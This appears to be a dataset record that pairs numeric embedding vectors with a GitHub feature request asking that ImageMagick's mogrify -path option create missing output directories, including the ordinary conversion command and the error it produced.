-0.01214597187936306, 0.005388902500271797, -0.00962603185325861, 0.0007757017738185823, 0.008941948413848877, -0.013912023976445198, 0.01373751275241375, 0.015524506568908691, -0.003235435578972101, -0.034120406955480576, -0.005992710590362549, 0.028871113434433937, 0.013220960274338722, 0.02191859297454357, -0.010100701823830605, 0.004917722195386887, -0.011196631006896496, -0.01145490724593401, -0.004279011860489845, -0.000003946950073441258, 0.020215364173054695, -0.014882305637001991, 0.008034490048885345, -0.018079347908496857, -0.014840423129498959, -0.011294357478618622, 0.0047501916997134686, -0.0025688032619655132, -0.0087953582406044, -0.0006648872513324022, 0.008893084712326527, 0.0026560586411505938, 0.004087049514055252, 0.00922116544097662, 0.009374735876917839, 0.004031206015497446, -0.026986394077539444, 0.006048554088920355, 0.01775824837386608, 0.006470871157944202, 0.012948722578585148, -0.002409998094663024, -0.03769439458847046, 0.004837447311729193, -0.00030386741855181754, 0.017925778403878212, 0.01654365099966526, -0.01813519187271595, -0.00278694205917418, -0.019293945282697678, 0.0042126975022256374, 0.004006774630397558, -0.0024309393484145403, -0.012243697419762611, -0.01680890843272209, -0.011413024738430977, -0.0013149409787729383, 0.012830055318772793, 0.02253287099301815, -0.019601084291934967, -0.01495211012661457, 0.013074370101094246, -0.003842734033241868, -0.00510968454182148, -0.004690858069807291, 0.0018759941449388862, -0.005549452733248472, -0.018009543418884277, -0.01735338196158409, 0.001842837082222104, 0.017702404409646988, -0.01968485116958618, -0.007301543839275837, -0.0153430150821805, -0.01054046954959631, -0.03289185091853142, -0.018246879801154137, -0.0004029024566989392, -0.0013027252862229943, 0.0053609805181622505, 0.03319898992776871, 0.0022843501064926386, 0.007846018299460411, -0.002860236680135131, -0.008774417452514172, -0.000879972125403583, 0.006059024948626757, -0.030239280313253403, 0.014910226687788963, 0.0016299334820359945, -0.023426368832588196, 0.0008284913492389023, -0.005846121348440647, -0.0000076280430221231654, 0.016669299453496933, 0.004785093944519758, 0.0021412509959191084, -0.02926201932132244, -0.01334660779684782, 0.004247599747031927, -0.0022389772348105907, 0.004006774630397558, -0.011413024738430977, 0.0008219472365453839, 0.011301337741315365, 0.02027120813727379, 0.012425188906490803, 0.012543857097625732, -0.012606680393218994, -0.009493403136730194, 0.004921212792396545, 0.0031062972266227007, -0.009409638121724129, 0.006170711945742369, 0.02954123727977276, 0.002814863808453083, 0.010449723340570927, 0.014491400681436062, -0.016864750534296036, 0.0007883538492023945, -0.019531279802322388, -0.0015950313536450267, 0.010407840833067894, -0.008837241679430008, 0.00007324012403842062, -0.015049835667014122, -0.00107237056363374, -0.011022119782865047, -0.0006321663968265057, -0.01047066505998373, 0.007643585558980703, 0.0018480723956599832, -0.026958473026752472, -0.021066978573799133, -0.02158353105187416, -0.012543857097625732, -0.01789785735309124, 0.009870346635580063, 0.015943333506584167, 0.009004771709442139, 0.009849405847489834, 0.0066872648894786835, -0.016697220504283905, 0.011643379926681519, 0.004069598391652107, 0.015063797123730183, 0.00045329253771342337, 0.012781191617250443, 0.001299235038459301, -0.010687058791518211, 0.003950931131839752, -0.0005924651632085443, 0.019950106739997864, -0.017939738929271698, -0.0007586869178339839, -0.01014956459403038, -0.008118255995213985, 0.0015740899834781885, -0.0186796672642231, -0.008320688270032406, -0.023901037871837616, 0.010547449812293053, -0.01397484727203846, 0.018358565866947174, -0.0035024373792111874, 0.024487394839525223, -0.03082563728094101, 0.01654365099966526, 0.0016255708178505301, 0.021876709535717964, 0.0059717693366110325, -0.010023917071521282, -0.0035181434359401464, 0.009046654216945171, 0.015147562138736248, 0.011692242696881294, 0.013709590770304203, 0.027433142066001892, 0.004408149980008602, 0.00713750347495079, -0.010030897334218025, 0.015608271583914757, -0.0009868601337075233, 0.021681256592273712, -0.0052562737837433815, 0.025283165276050568, -0.004676897078752518, 0.000685392296873033, 0.011133807711303234, -0.008229942992329597, -0.0031499250326305628, -0.010379919782280922, 0.02459908276796341, -0.016320277005434036, -0.026958473026752472, -0.001249499386176467, -0.01606898009777069, -0.007134013343602419, -0.010268231853842735, 0.013367549516260624, -0.014163319952785969, 0.013528099283576012, 0.010212388820946217, -0.012641582638025284, 0.01647384651005268, 0.02666529454290867, 0.02713996358215809, -0.0025722933933138847, -0.01125247497111559, 0.010226349346339703, 0.004729250445961952, 0.007846018299460411, -0.013835239224135876, -0.010303134098649025, 0.010561411269009113, 0.01968485116958618, 0.014421596191823483, 0.015538467094302177, 0.010833648033440113, 0.0033837698865681887, 0.006659342907369137, 0.012411228381097317, 0.011762047186493874, 0.04096124321222305, -0.0039788526482880116, -0.0017241694731637836, 0.02713996358215809, 0.005636707879602909, -0.002642097882926464, -0.009737718850374222, 0.015775801613926888, 0.025045830756425858, 0.012425188906490803, 0.012055225670337677, 0.0008433248149231076, 0.01972673274576664, -0.0015069032087922096, 0.028103265911340714, 0.005291176028549671, 0.0015522760804742575, 0.010345017537474632, 0.018735509365797043, 0.0015086483908817172, 0.04199434816837311, 0.00019807007629424334, 0.001115998369641602, -0.002539136214181781, 0.021122822538018227, -0.00004002848072559573, 0.005769336596131325, 0.007894881069660187, -0.016334237530827522, 0.01461704820394516, -0.01280911359935999, 0.0009484677575528622, 0.011817891150712967, -0.007196837104856968, -0.008355590514838696, -0.00862782821059227, -0.000732946558855474, -0.00033637011074461043, -0.024040646851062775, -0.023286759853363037, -0.011015139520168304, 0.017911817878484726, 0.0005169890937395394, -0.02990422025322914, 0.033171068876981735, -0.026274388656020164, 0.0014807265251874924, -0.004114971496164799, 0.004240619484335184, 0.004858388565480709, -0.007811116054654121, -0.004216187633574009, -0.0054168240167200565, 0.02364974282681942, 0.033813267946243286, 0.0000978352763922885, -0.006045063957571983, -0.000827182549983263, 0.012159932404756546, -0.015594310127198696, 0.0008908790769055486, 0.007144483737647533, 0.009172302670776844, -0.013583943247795105, -0.007203817833214998, -0.004128932487219572, 0.0033331618178635836, -0.008509160950779915, -0.005587845109403133, -0.012460091151297092, -0.004345326218754053, -0.015133601613342762, 0.025199400261044502, -0.020313089713454247, 0.011678282171487808, 0.020341012626886368, 0.016725141555070877, -0.03342236205935478, -0.030071750283241272, 0.02357993833720684, 0.023538054898381233, 0.0024780575186014175, -0.0035635163076221943, -0.00688620749861002, -0.010107682086527348, -0.02395688183605671, 0.0024745671544224024, -0.015426780097186565, 0.023161111399531364, 0.010659136809408665, 0.021122822538018227, -0.0035024373792111874, 0.008690652437508106, -0.012857976369559765, 0.0032842985820025206, -0.00011223243927815929, 0.0014903246192261577, 0.008188060484826565, -0.007329465355724096, 0.00017996455426327884, -0.005664629861712456, 0.009444540366530418, -0.02659549005329609, -0.004202227108180523, 0.010163526050746441, -0.010177486576139927, 0.013905043713748455, -0.008097314275801182, -0.01273930910974741, 0.010449723340570927, -0.014030691236257553, 0.020145559683442116, -0.000588102382607758, -0.006844324991106987, -0.004240619484335184, -0.003776419907808304, 0.011245494708418846, 0.027293533086776733, -0.019028687849640846, 0.008250883780419827, -0.024920182302594185, -0.0010749882785603404, 0.006369654554873705, -0.005559923127293587, 0.02215592749416828, 0.00110989052336663, 0.005685571115463972, -0.0006932452670298517, -0.02700035460293293, -0.029932141304016113, 0.019168296828866005, 0.008851202204823494, -0.008076373487710953, -0.02077380008995533, 0.017213772982358932, 0.0025914895813912153, -0.012439150363206863, 0.0037519882898777723, 0.008299747481942177, -0.0033279263880103827, 0.034567154943943024, -0.011070983484387398, 0.0127742113545537, -0.00019905170483980328, 0.01395390648394823, 0.0069595021195709705, 0.021053018048405647, 0.004230148624628782, -0.002043524757027626, 0.024808496236801147, -0.006114868447184563, -0.024068569764494896, -0.014170300215482712, 0.003909048158675432, -0.023719547316432, -0.0031883176416158676, 0.0014318634057417512, 0.00925606768578291, 0.027084119617938995, -0.002060975879430771, 0.010645176284015179, -0.009535285644233227, 0.004303443245589733, 0.013444334268569946, 0.008732534945011139, -0.02131827361881733, 0.0007879175245761871, -0.0005876660579815507, 0.011189650744199753, 0.017953701317310333, -0.034623000770807266, 0.04414432495832443, -0.005329568404704332, 0.007657546550035477, 0.025380892679095268, -0.01806538738310337, -0.011545653454959393, 0.007783194538205862, -0.015719957649707794, 0.010980237275362015, 0.029987985268235207, 0.010910432785749435, -0.0068478151224553585, 0.005357490386813879, 0.0048479181714355946, 0.007657546550035477, 0.014421596191823483, -0.01437971368432045, -0.010324075818061829, -0.0061881630681455135, 0.010568391531705856, -0.007524917833507061, 0.0068478151224553585, 0.03227756917476654, -0.0017520913388580084, -0.006376635283231735, 0.015384897589683533, 0.016739103943109512, 0.014337831176817417, 0.0013035978190600872, -0.0448702909052372, 0.016822868958115578, 0.01463100966066122, 0.0021115841809660196, 0.0027084120083600283, 0.00898383092135191, 0.003336651949211955, -0.014393674209713936, 0.006896677892655134, 0.01241820864379406, -0.026469841599464417, 0.013919004239141941, -0.02686074562370777, -0.006442949175834656, -0.01398880872875452, 0.003671713173389435, 0.0236218199133873, 0.0046943482011556625, 0.0054168240167200565, 0.018986806273460388, 0.03247302398085594, 0.008976850658655167, 0.00294400192797184, -0.010414822027087212, 0.0153430150821805, 0.0021587021183222532, 0.017046242952346802, 0.015622232109308243, -0.004917722195386887, -0.016110863536596298, -0.0015732174506410956, -0.003598418552428484, -0.013716571033000946, 0.0024571160320192575, -0.026818864047527313, -0.02700035460293293, 0.011461888439953327, -0.003671713173389435, 0.02690262906253338, -0.012592719867825508, 0.05288384109735489, 0.023426368832588196, -0.01150377094745636, 0.0018742490792647004, 0.00869763270020485, 0.008222962729632854, 0.0003324436256662011, -0.01532905362546444, -0.015775801613926888, 0.003936970140784979, -0.020731916651129723, -0.010624234564602375, -0.0035111629404127598, 0.004334855359047651, -0.009081556461751461, -0.003193552838638425, -0.00738530931994319, -0.009332852438092232, 0.000025781286240089685, -0.009954112581908703, -0.0032877889461815357, 0.040039822459220886, 0.0070711891166865826, -0.001921367016620934, -0.01146886870265007, -0.012327463366091251, -0.020257247611880302, -0.011950518935918808, 0.0003324436256662011, 0.002231996739283204, 0.005231842398643494, -0.016753064468503, -0.0034622999373823404, -0.0015234817983582616, 0.007182876113802195, -0.007957705296576023, 0.0015496584819629788, 0.005884513724595308, -0.020354973152279854, -0.023398445919156075, 0.013430372811853886, 0.015622232109308243, -0.010980237275362015, -0.013339627534151077, 0.008404454216361046, 0.026441920548677444, -0.010205408558249474, -0.006418517790734768, -0.011524711735546589, 0.004383718594908714, -0.010442743077874184, -0.013814297504723072, -0.000824128626845777, 0.001931837759912014, -0.006931580137461424, -0.00198768125846982, -0.02602309361100197, 0.011070983484387398, 0.01830272190272808, 0.00603110296651721, 0.01604105904698372, -0.00823692325502634, -0.002638607518747449, 0.011203611269593239, 0.0053051370196044445, 0.021192627027630806, 0.02165333554148674, -0.000034738612157525495, 0.02429194375872612, -0.012690446339547634, 0.022826049476861954, -0.00891402643173933, 0.07483035326004028, 0.013437354005873203, -0.014924188144505024, -0.028577934950590134, -0.0006509263766929507, -0.007832057774066925, -0.014114456251263618, -0.008104294538497925, -0.02053646370768547, 0.013374529778957367, 0.0011317044263705611, 0.0036682230420410633, -0.015147562138736248, -0.005640198476612568, 0.007182876113802195, 0.0037240665405988693, 0.011273415759205818, -0.025129595771431923, 0.009800542145967484, 0.0033017497044056654, 0.0012957447906956077, -0.01558034960180521, -0.005064311902970076, 0.010331056080758572, 0.025129595771431923, 0.000022931846615392715, 0.00734342634677887, 0.00688620749861002, -0.008816299960017204, -0.0016735612880438566, 0.007004874758422375, 0.00033506128238514066, -0.0018480723956599832, 0.01218087412416935, -0.011727144941687584, 0.004415130242705345, -0.004418620839715004, 0.001732022501528263, 0.02395688183605671, 0.0009083301993086934, 0.01911245472729206, -0.00984242558479309, 0.006463890429586172, 0.024640964344143867, -0.0027363337576389313, -0.02507375366985798, 0.007329465355724096, -0.0018951903330162168, 0.0031411994714289904, 0.0035216338001191616, -0.01722773350775242, 0.01419124100357294, -0.016864750534296036, -0.013283783569931984, 0.007825077511370182, 0.01847025379538536, -0.01752091385424137, 0.016627416014671326, -0.0062928698025643826, 0.006956011988222599, -0.018093308433890343, -0.010400860570371151, 0.027488986030220985 ]
null
null
null
null
null
null
null
null
null
[ "ImageMagick", "ImageMagick" ]
### Is your feature request related to a problem? Please describe. -path currently chokes if the destination location doesn't exist. `mogrify.exe -format tif -path ..\new_dir pngs\*.png` `mogrify.exe: unable to open image '..\new_dir\0.tif': No such file or directory @ error/blob.c/OpenBlob/3571.` ### Describe the solution you'd like It should create any directories needed, as specified in the argument. ### Describe alternatives you've considered _No response_ ### Additional context _No response_
Have -path create any needed directories rather than throwing an error.
https://api.github.com/repos/ImageMagick/ImageMagick/issues/7157/comments
1
2024-03-10T12:19:32
2024-03-23T21:57:54Z
https://github.com/ImageMagick/ImageMagick/issues/7157
2,177,689,441
7,157
false
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : Have -path create any needed directories rather than throwing an error. Issue date: --- start body --- ### Is your feature request related to a problem? Please describe. -path currently chokes if the destination location doesn't exist. `mogrify.exe -format tif -path ..\new_dir pngs\*.png` `mogrify.exe: unable to open image '..\new_dir\0.tif': No such file or directory @ error/blob.c/OpenBlob/3571.` ### Describe the solution you'd like It should create any directories needed, as specified in the argument. ### Describe alternatives you've considered _No response_ ### Additional context _No response_ --- end body ---
700
[ -0.01599889248609543, 0.03164910897612572, -0.01451031118631363, 0.025185178965330124, 0.017956845462322235, 0.029396120458841324, 0.025010840967297554, 0.030844468623399734, -0.04406736046075821, 0.022690800949931145, 0.015382002107799053, 0.0395345613360405, -0.01115765143185854, 0.008334712125360966, -0.0038924377877265215, 0.002995601389557123, -0.008515755645930767, 0.008388354443013668, -0.014684649184346199, -0.06882339715957642, -0.005280438810586929, -0.011171062476933002, -0.03213189169764519, 0.020048905164003372, -0.02069261483848095, -0.020397581160068512, -0.0029905724804848433, 0.0174070093780756, -0.015770910307765007, 0.014027528464794159, 0.04924386367201805, 0.02644577994942665, 0.006440459284931421, 0.017661811783909798, 0.006517570465803146, 0.0174070093780756, 0.013698967173695564, 0.054527655243873596, -0.035806406289339066, 0.010534056462347507, -0.011707487516105175, -0.06426378339529037, -0.006192362401634455, 0.02393799088895321, -0.029181549325585365, 0.008509050123393536, -0.01103025022894144, 0.005324023775756359, -0.03449216112494469, 0.04420146346092224, -0.0008649862138554454, -0.07949826866388321, 0.01972704939544201, -0.015770910307765007, -0.010051273740828037, -0.016200050711631775, 0.024152560159564018, -0.02051827684044838, -0.03285606577992439, 0.02051827684044838, -0.026070281863212585, 0.042511723935604095, -0.013068667612969875, 0.0306567195802927, 0.02560090832412243, -0.029181549325585365, -0.03191731870174408, 0.04524749517440796, -0.0012857449473813176, -0.0167901199311018, -0.023334510624408722, -0.014349383302032948, -0.004090244881808758, -0.012820570729672909, 0.03240010142326355, -0.02451464720070362, 0.036637865006923676, 0.004884825088083744, 0.002973809139803052, -0.036369651556015015, -0.019405193626880646, -0.0057464586570858955, -0.049699828028678894, -0.02722359634935856, 0.04012463241815567, -0.018922410905361176, -0.02341497503221035, -0.057022035121917725, 0.01732654497027397, 0.008804084733128548, -0.003936022520065308, 0.006075019482523203, -0.0014743320643901825, -0.0038522060494869947, 0.009789765812456608, 0.019619764760136604, -0.010178674943745136, -0.008904663845896721, -0.03274878114461899, -0.042163047939538956, -0.014443257823586464, -0.00696012144908309, -0.045757099986076355, 0.008100025355815887, -0.04165344312787056, -0.007885455153882504, 0.017594758421182632, 0.0008205634658224881, 0.022945603355765343, 0.05809488520026207, -0.003694630926474929, 0.0007204027497209609, 0.0028262920677661896, 0.0020333880092948675, 0.03349977359175682, -0.0046769604086875916, 0.022556694224476814, -0.004348399583250284, -0.009970810264348984, 0.004941820167005062, -0.00980317685753107, -0.028430553153157234, -0.03569912165403366, -0.0012337787775322795, -0.02393799088895321, 0.005907386541366577, -0.02381729520857334, -0.006189009640365839, -0.0016411269316449761, 0.03288288787007332, -0.05085314065217972, -0.03095175325870514, 0.02718336507678032, 0.030764004215598106, 0.0029654274694621563, -0.006178951822221279, -0.06447835266590118, 0.014134813100099564, -0.06029423326253891, -0.02416597120463848, -0.05900681018829346, -0.05745117738842964, -0.005330728832632303, -0.0014265567297115922, -0.011566676199436188, 0.010399950668215752, -0.0036074616946280003, -0.02244940958917141, -0.0038119740784168243, 0.023347921669483185, -0.02507789433002472, 0.00044967548456043005, 0.025064483284950256, -0.004827830009162426, 0.0312199667096138, -0.006162188481539488, -0.01626710407435894, 0.000902703613974154, 0.0010250756749883294, -0.03331202641129494, 0.041331589221954346, -0.024930376559495926, -0.004368515685200691, 0.02985208109021187, -0.009682481177151203, -0.013129015453159809, -0.05348162725567818, -0.015972070395946503, 0.008844316005706787, 0.017688632011413574, -0.026995616033673286, 0.004408747423440218, 0.0011088921455666423, -0.042511723935604095, -0.031461358070373535, 0.013370406813919544, -0.004512679763138294, 0.0170985646545887, 0.023951400071382523, -0.03178321197628975, -0.019351551309227943, -0.02739793434739113, -0.010379834100604057, -0.017460651695728302, 0.04074152186512947, 0.030683541670441628, -0.0005955161759629846, 0.014040938578546047, 0.006494101602584124, -0.01995502971112728, 0.012243913486599922, 0.03634282946586609, 0.005156390368938446, -0.021845931187272072, 0.074348583817482, 0.008636451326310635, 0.011016840115189552, -0.03258785232901573, 0.005840333178639412, 0.014926040545105934, -0.012606000527739525, -0.00201662490144372, -0.02920837141573429, 0.015623394399881363, -0.01933814026415348, 0.020893774926662445, -0.024139149114489555, -0.01098331343382597, 0.0030475675594061613, -0.040982913225889206, -0.02227507159113884, -0.01451031118631363, 0.004874767269939184, -0.024916967377066612, -0.020799901336431503, 0.017728865146636963, 0.010902849026024342, 0.0384080708026886, -0.015207664109766483, -0.01160020288079977, -0.0037750948686152697, 0.006933300290256739, -0.012129922397434711, -0.002682127756997943, -0.005511772353202105, -0.01762157864868641, 0.0017266197828575969, -0.010366423986852169, -0.029127907007932663, 0.010648047551512718, 0.008649862371385098, 0.015462466515600681, 0.008804084733128548, 0.007335619535297155, 0.020330527797341347, -0.007637358736246824, -0.008589514531195164, -0.018828537315130234, -0.016642602160573006, 0.0017702042823657393, 0.04184119403362274, 0.027035847306251526, -0.004985405132174492, -0.015221075154840946, 0.029959367588162422, -0.02236894518136978, 0.014443257823586464, -0.00696012144908309, 0.010869322344660759, 0.01345757581293583, 0.011613612994551659, 0.012485304847359657, 0.023495439440011978, 0.0023753594141453505, 0.0053474921733140945, -0.017702043056488037, -0.029664332047104836, 0.010869322344660759, -0.009615427814424038, -0.013987296260893345, 0.02482309192419052, 0.0038320899475365877, 0.006095135118812323, 0.033392488956451416, 0.04522067308425903, -0.05020943284034729, -0.04406736046075821, 0.046373989433050156, 0.005280438810586929, -0.002232871251180768, 0.014175045304000378, -0.05589554086327553, -0.012706580571830273, -0.005800101440399885, -0.01190864760428667, -0.04438921436667442, 0.03398256003856659, 0.026378726586699486, 0.04519385099411011, -0.010145148262381554, -0.025681372731924057, 0.007583715952932835, 0.01436279434710741, 0.011694076471030712, -0.021510664373636246, 0.033124279230833054, -0.025882532820105553, 0.0036476936656981707, -0.08588173240423203, 0.02109493501484394, -0.008844316005706787, 0.024259844794869423, -0.026633528992533684, 0.006061608903110027, -0.0016997985076159239, 0.009501437656581402, -0.032024603337049484, -0.035323623567819595, -0.017474062740802765, -0.014309151098132133, -0.036423295736312866, -0.0015522814355790615, 0.016159819439053535, 0.010929670184850693, 0.005203327629715204, 0.026807866990566254, -0.022301891818642616, 0.009018654935061932, 0.00936062540858984, -0.01986115612089634, 0.04275311529636383, 0.015046736225485802, 0.036852434277534485, 0.010527350939810276, -0.04135841131210327, 0.005176506470888853, 0.03095175325870514, -0.044308751821517944, -0.04025873914361, -0.013075373135507107, -0.03170274943113327, -0.0008431939058937132, -0.019043106585741043, -0.006319763604551554, 0.007965919561684132, -0.012116512283682823, -0.030844468623399734, -0.008294479921460152, -0.014631006866693497, -0.03060307726264, 0.014912630431354046, -0.02706266939640045, 0.014161634258925915, -0.017527705058455467, -0.006286236923187971, -0.039883241057395935, -0.013960475102066994, -0.0093203941360116, 0.04253854602575302, -0.008100025355815887, -0.0034297709353268147, 0.015180842950940132, 0.02928883396089077, -0.013323469087481499, 0.013068667612969875, 0.009769650176167488, -0.013048551045358181, -0.00947461649775505, 0.006500807125121355, 0.011942173354327679, 0.0007824269705452025, 0.0171522069722414, -0.046025313436985016, -0.023012656718492508, 0.008730325847864151, 0.005625762976706028, 0.027599094435572624, -0.03730839863419533, 0.01713879592716694, 0.0064873965457081795, 0.012002521194517612, -0.05970416218042374, -0.014617595821619034, -0.012243913486599922, -0.024581700563430786, 0.03451898321509361, -0.005558709613978863, -0.010869322344660759, -0.0468299500644207, -0.035055410116910934, 0.005652584135532379, 0.026070281863212585, 0.01190194208174944, 0.0021356442011892796, -0.035404086112976074, -0.011667255312204361, -0.00021771334286313504, -0.013799547217786312, 0.0020635619293898344, 0.008408470079302788, -0.016910815611481667, 0.014952861703932285, -0.008482228964567184, -0.03100539743900299, -0.02403186447918415, 0.03669150918722153, 0.002465881174430251, -0.009997631423175335, 0.009461205452680588, -0.01453713234513998, -0.052676986902952194, 0.01440302561968565, -0.02157771773636341, -0.02867194637656212, -0.02117539756000042, 0.046990878880023956, 0.015985481441020966, -0.02306629903614521, -0.04905611649155617, -0.023495439440011978, 0.01846645027399063, -0.0696280375123024, 0.01872125081717968, 0.030066652223467827, -0.006333174183964729, 0.019217444583773613, 0.011700781993567944, -0.02389775775372982, -0.019794102758169174, 0.023133352398872375, -0.034921303391456604, -0.00007396805449388921, 0.009079002775251865, 0.04471106827259064, 0.027089489623904228, 0.0188955906778574, 0.013316764496266842, 0.005558709613978863, -0.0027223597280681133, -0.014577364549040794, 0.002972132759168744, -0.016602370887994766, -0.019914798438549042, 0.021322915330529213, 0.022690800949931145, -0.004683665465563536, 0.01225732360035181, -0.0009144379291683435, 0.033741168677806854, 0.000558217812795192, -0.005538593977689743, -0.02428666688501835, -0.015100379474461079, 0.013102194294333458, -0.013759315013885498, -0.03100539743900299, -0.015837963670492172, -0.002578195184469223, -0.004096949938684702, 0.014684649184346199, -0.0039058485999703407, 0.03427759185433388, -0.010963196866214275, 0.0010921289213001728, -0.03626236692070961, -0.01422868762165308, -0.013343585655093193, 0.035430908203125, -0.019968440756201744, -0.03572594001889229, 0.038086213171482086, 0.079069122672081, -0.0019462188938632607, -0.027599094435572624, -0.0075971269980072975, -0.010949786752462387, -0.035940513014793396, -0.0006868761265650392, -0.002605016576126218, 0.014604185707867146, 0.01210310123860836, -0.010775447823107243, -0.021738644689321518, 0.01467123907059431, 0.00813355203717947, -0.009521553292870522, 0.00920640304684639, 0.03620872274041176, 0.04240443930029869, 0.007563600316643715, 0.019968440756201744, 0.022261660546064377, 0.021497253328561783, 0.03033486381173134, 0.004938467871397734, -0.0018624024232849479, -0.04283358156681061, -0.015556341037154198, 0.04326272010803223, -0.004653491545468569, -0.074348583817482, -0.0697353184223175, -0.015194253996014595, 0.014778523705899715, -0.009836703538894653, -0.017380187287926674, 0.013430754654109478, -0.01532835979014635, -0.019579531624913216, 0.035189516842365265, 0.01841280609369278, 0.0341971293091774, -0.012331082485616207, 0.013698967173695564, 0.0036275777965784073, 0.00015003152657300234, -0.061581652611494064, -0.01210310123860836, 0.00116756372153759, 0.018882179632782936, -0.02092059701681137, 0.019002875313162804, 0.02148384228348732, -0.00398966483771801, 0.04629352316260338, -0.002658659126609564, 0.0024742628447711468, -0.02407209575176239, -0.015194253996014595, 0.0066717928275465965, -0.019633175805211067, -0.03140771761536598, -0.013115604408085346, -0.056539252400398254, 0.014443257823586464, 0.0035001765936613083, 0.011553265154361725, 0.020062316209077835, -0.00046937234583310783, 0.010607815347611904, -0.032641492784023285, -0.03143453598022461, 0.0021591128315776587, 0.04245808348059654, -0.005699521396309137, 0.009588606655597687, 0.0015204311348497868, 0.011660550720989704, 0.0048915306106209755, -0.011372221633791924, 0.023482028394937515, 0.03384845331311226, 0.04090244695544243, 0.036423295736312866, 0.01440302561968565, 0.02797459252178669, 0.0011248172959312797, -0.01333017461001873, 0.006899773608893156, -0.004442274104803801, -0.011399042792618275, 0.01146609615534544, -0.04304815083742142, 0.0029302246402949095, -0.008904663845896721, 0.013504513539373875, -0.030629899352788925, 0.028993800282478333, -0.004646786488592625, -0.0022663979325443506, 0.01990138739347458, -0.023495439440011978, 0.0021373205818235874, -0.0008616335107944906, -0.01683035120368004, 0.027867307886481285, 0.00982329249382019, 0.016414621844887733, 0.005223443731665611, 0.0010963197564706206, 0.009213108569383621, 0.0032235821709036827, 0.01236460916697979, 0.018010487779974937, 0.013363701291382313, -0.008254247717559338, 0.04007098823785782, -0.021564306691288948, -0.02573501504957676, -0.016159819439053535, 0.027290649712085724, -0.011895236559212208, 0.024098917841911316, 0.0026938619557768106, -0.010614520870149136, -0.009192992933094501, 0.03559183329343796, 0.007281976751983166, -0.014684649184346199, -0.017916614189743996, 0.02706266939640045, 0.003795210737735033, -0.015596573241055012, 0.011083892546594143, -0.004046660382300615, -0.006862894166260958, -0.0066516767255961895, -0.024487826973199844, 0.013430754654109478, -0.04495245963335037, 0.012136627919971943, 0.03073718398809433, 0.02832326851785183, 0.023911168798804283, 0.04409417882561684, -0.0009144379291683435, -0.011506328359246254, 0.023441797122359276, 0.013296647928655148, -0.008643156848847866, -0.00009104566561290994, 0.013122309930622578, 0.004623317625373602, -0.01731313392519951, -0.005655936896800995, 0.005826922599226236, 0.025507034733891487, -0.0625472217798233, -0.018439628183841705, -0.014979683794081211, 0.004117066040635109, -0.0009890346555039287, 0.002150731161236763, -0.002068591071292758, 0.04275311529636383, 0.004968641791492701, 0.016374390572309494, 0.04205576330423355, -0.02494378760457039, -0.03529680147767067, 0.011989111080765724, -0.03695971891283989, 0.00029377680039033294, -0.006745551247149706, -0.025775248184800148, 0.03653058037161827, -0.015261306427419186, -0.006178951822221279, -0.00069064786657691, -0.018184825778007507, 0.013631913810968399, 0.007288682274520397, 0.005096042528748512, -0.031193146482110023, -0.026553064584732056, 0.009990925900638103, 0.025292465463280678, 0.0043450468219816685, -0.03371434658765793, -0.00004623003405868076, -0.022087322548031807, -0.01409458089619875, 0.0048714145086705685, 0.027652736753225327, -0.014107991941273212, -0.0007979330257512629, 0.0074697257950901985, 0.008985128253698349, 0.006158835720270872, 0.029476583003997803, -0.06506841629743576, -0.023750241845846176, -0.013987296260893345, 0.01256576832383871, 0.012170154601335526, -0.017246080562472343, -0.008636451326310635, 0.0444696769118309, -0.0069064791314303875, -0.02424643561244011, -0.0014223658945411444, -0.021644771099090576, -0.020223243162035942, 0.00811343640089035, 0.01893582195043564, 0.007892160676419735, 0.012532241642475128, -0.011345400474965572, -0.015556341037154198, 0.002465881174430251, 0.02556067705154419, -0.03392891585826874, -0.019539300352334976, 0.027210185304284096, -0.02596299722790718, 0.01118447259068489, 0.03556501492857933, -0.007550189737230539, -0.015033326111733913, 0.03433123603463173, 0.019887976348400116, -0.026995616033673286, -0.008502344600856304, -0.010527350939810276, -0.004945172928273678, -0.0083950599655509, 0.01837257482111454, -0.03371434658765793, -0.007194807752966881, -0.0075770108960568905, 0.001620172755792737, 0.012264029122889042, -0.02845737524330616, 0.028296448290348053, -0.001115597551688552, 0.01666942425072193, 0.0017987019382417202, 0.0025379634462296963, 0.010171969421207905, -0.007134459912776947, -0.03164910897612572, 0.025010840967297554, -0.0006185657111927867, 0.002884963760152459, -0.016280515119433403, -0.02762591652572155, 0.0004861356574110687, -0.004160650540143251, -0.019016286358237267, -0.009072297252714634, -0.0036510464269667864, 0.012934560887515545, 0.0022496345918625593, 0.0036175197456032038, -0.007818402722477913, 0.01978069171309471, -0.014872398227453232, -0.028993800282478333, -0.03915906324982643, 0.0045998492278158665, -0.00122204446233809, -0.0017199143767356873, -0.02679445594549179, -0.0318368561565876, 0.025574088096618652, 0.019834334030747414, 0.002943635219708085, 0.011781246401369572, 0.006681850645691156, 0.011244820430874825, -0.01692422665655613, -0.01972704939544201, 0.0396418496966362, 0.007905571721494198, 0.0070137642323970795, -0.00403324980288744, -0.0030676836613565683, 0.00010361813474446535, 0.009903756901621819, -0.010212201625108719, 0.015623394399881363, -0.009883640334010124, -0.004750718828290701, -0.04256536811590195, 0.007992740720510483, 0.00951484777033329, -0.0012790396576747298, 0.009481321088969707, -0.004314872901886702, -0.017702043056488037, 0.04363821819424629, -0.009239929728209972, 0.016079355031251907, -0.03596733137965202, 0.009146055206656456, 0.014899219386279583, 0.0009488026844337583, -0.010091505944728851, 0.026016639545559883, -0.009306983090937138, 0.009420973248779774, -0.018117772415280342, -0.025936175137758255, 0.007999446243047714, 0.025051072239875793, 0.013108898885548115, 0.03376798704266548, 0.00148774276021868, 0.012800454162061214, -0.01084920670837164, 0.006192362401634455, 0.010694984346628189, -0.03451898321509361, 0.0014693031553179026, 0.0378984659910202, -0.027867307886481285, -0.013028435409069061, -0.009997631423175335, -0.002276455983519554, 0.002048474969342351, -0.009870230220258236, -0.013906831853091717, -0.012780338525772095, 0.04326272010803223, 0.014644416980445385, -0.018171414732933044, 0.00014814564201515168, 0.0034834134858101606, -0.03060307726264, 0.015516108833253384, -0.018211647868156433, -0.010285959579050541, 0.01837257482111454, -0.010835795663297176, -0.0060381400398910046, 0.008649862371385098, 0.04404053837060928, 0.010507235303521156, 0.026070281863212585, -0.012974793091416359, -0.02420620247721672, 0.02279808558523655, 0.00859621912240982, -0.013799547217786312, -0.04068787768483162, -0.007845223881304264, -0.026056870818138123, 0.02227507159113884, -0.021725235506892204, 0.022677389904856682, 0.01674988679587841, -0.0011038632364943624, -0.029610689729452133, -0.0018489918438717723, -0.00008737869211472571, 0.007436199113726616, 0.0025061131455004215, -0.00535084493458271, -0.012290850281715393, 0.035404086112976074, -0.05125546082854271, 